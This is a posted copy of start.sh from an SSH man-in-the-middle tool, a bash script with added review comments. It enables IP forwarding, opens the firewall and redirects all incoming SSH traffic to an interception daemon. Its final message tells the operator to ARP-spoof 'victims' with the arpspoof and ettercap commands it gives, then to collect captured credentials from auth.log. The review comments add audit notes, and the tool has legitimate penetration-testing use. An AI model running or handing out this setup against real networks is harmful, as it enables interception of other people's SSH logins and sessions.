FlyFar

start.sh

Aug 12th, 2023
  1. #!/bin/bash
  2.  
  3. # run.sh
  4. # Copyright (C) 2017  Joe Testa <jtesta@positronsecurity.com>
  5. #
  6. # This program is free software: you can redistribute it and/or modify
  7. # it under the terms version 3 of the GNU General Public License as
  8. # published by the Free Software Foundation.
  9. #
  10. # This program is distributed in the hope that it will be useful,
  11. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  12. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13. # GNU General Public License for more details.
  14. #
  15. # You should have received a copy of the GNU General Public License
  16. # along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17.  
  # Root gate: the steps further down write to /proc/sys and change iptables
  # state, so stop here for any other effective UID.  Under bash, "exit -1"
  # is seen by the caller as status 255.
  [[ "$(id -u)" == 0 ]] || {
      echo "Error: this script must be run as root."
      exit -1
  }
  22.  
  # Make sure sshd_mitm was correctly installed: both the launcher script and
  # the binary must exist as regular files.  The first missing one aborts the
  # run before anything on the host is changed.
  for required in /home/ssh-mitm/run.sh /home/ssh-mitm/bin/sshd_mitm; do
      if [[ ! -f "$required" ]]; then
          echo "Error: could not find sshd_mitm.  You need to first run install.sh."
          exit -1
      fi
  done
  28.  
  # Hand off to the launcher as the unprivileged ssh-mitm user.  A login shell
  # is requested, so ./run.sh is resolved from that account's home directory
  # (presumably /home/ssh-mitm, which is where the check above looks for it).
  # NOTE(review): the exit status of su is not checked, so the kernel and
  # firewall changes below are applied even when the launcher fails.
  printf '%s\n' "Running sshd_mitm in unprivileged account..."
  su -l ssh-mitm -c './run.sh'
  31.  
  # Turn the host into an IPv4 forwarder.  This is a host-wide kernel setting.
  printf '%s\n' "Enabling IP forwarding in kernel..."
  printf '1\n' > /proc/sys/net/ipv4/ip_forward

  # The FORWARD policy is the fallback for every forwarded packet that no rule
  # in the chain matches, not just SSH traffic.
  # NOTE(review): neither the previous ip_forward value nor the previous
  # FORWARD policy is saved here, so the host's original state cannot be
  # restored from anything this script records.  When auditing a host,
  # ip_forward=1 together with a FORWARD policy of ACCEPT on a machine that is
  # not meant to route is worth flagging.
  printf '%s\n' "Changing FORWARD table default policy to ACCEPT..."
  iptables --policy FORWARD ACCEPT
  37.  
  # Open TCP port 2222 in the INPUT chain unless the numeric listing already
  # shows an ACCEPT for it from and to any address.
  # NOTE(review): the test matches the text that "iptables -nL" prints, so a
  # different column layout makes it miss and a duplicate rule is appended on
  # every run; "iptables -C" tests for the rule itself.
  if ! iptables -nL INPUT | grep -E "ACCEPT +tcp +-- +0\.0\.0\.0/0 +0\.0\.0\.0/0 +tcp dpt:2222" > /dev/null; then
      echo "Executing: iptables -A INPUT -p tcp --dport 2222 -j ACCEPT"
      iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
  fi
  45.  
  # Add a nat/PREROUTING REDIRECT from TCP port 22 to local port 2222 unless
  # the numeric listing already shows one.  The rule has no source or
  # destination restriction, so it applies to every TCP/22 packet arriving at
  # this host.
  # NOTE(review): same text-matching caveat as the INPUT check above.  For
  # anyone auditing or restoring the host, this REDIRECT in the nat table is
  # the rule to look for and delete.
  if ! iptables -t nat -nL PREROUTING | grep -E "REDIRECT +tcp +-- +0\.0\.0\.0/0 +0\.0\.0\.0/0 +tcp dpt:22 redir ports 2222" > /dev/null; then
      echo "Executing: iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222"
      iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  fi
  53.  
  # Closing operator message; echo -e expands the \n and \t sequences.  The
  # text names /var/log/auth.log and /home/ssh-mitm/ as the places where
  # captured credentials and session logs end up, so after a test both hold
  # sensitive data that needs restricted access and cleanup.  It also names
  # stop.sh as the companion script.
  closing_note="\n\nDone!  Now ARP spoof your victims and watch /var/log/auth.log for credentials.  Logged sessions will be in /home/ssh-mitm/.  Hint: ARP spoofing can either be done with:\n\n\tarpspoof -r -t 192.168.x.1 192.168.x.5\n\n\t\tOR\n\n\tettercap -i enp0s3 -T -M arp /192.168.x.1// /192.168.x.5,192.168.x.6//\n\nIf you don't have a list of targets yet, run stop.sh and use JoesAwesomeSSHMITMVictimFinder.py to find them.  Then run this script again.\n"
  echo -e "${closing_note}"
  exit 0
Tags: mitm attack